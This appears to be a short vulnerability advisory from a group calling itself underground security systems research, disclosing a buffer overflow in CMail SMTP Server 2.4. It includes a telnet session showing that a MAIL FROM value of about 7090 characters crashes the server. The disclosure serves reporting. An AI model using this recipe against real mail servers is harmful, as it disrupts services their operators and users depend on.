CMail SMTP Server Version 2.4: Remotely exploitable buffer overflow
Cmail smtp server 2.4 CMail SMTP Server Version 2.4


We found a buffer overflow in the CMail SMTP service (long MAIL FROM:) that may

allow an attacker to execute arbitrary code on the target server, it is based on the eEye

pointed out overflows in cmail 2.3 >:-] Which was never fixed... software vendors still

not taking security issues seriously.


[cham@guilt cham]$ telnet 25


Connected to

Escape character is '^]'.

220 SMTP services ready. Computalynx CMail Server Version: 2.4

helo ussr

250 Hello ussr [yourip], how are you today?

MAIL FROM: cmail <[buffer]>

Where [buffer] is aprox. 7090 characters.

At his point the server overflows and crashes. Just a typical buffer overflow that should

have been fixed in version 2.3 when it was pointed out to them.


u n d e r g r o u n d s e c u r i t y s y s t e m s r e s e a r c h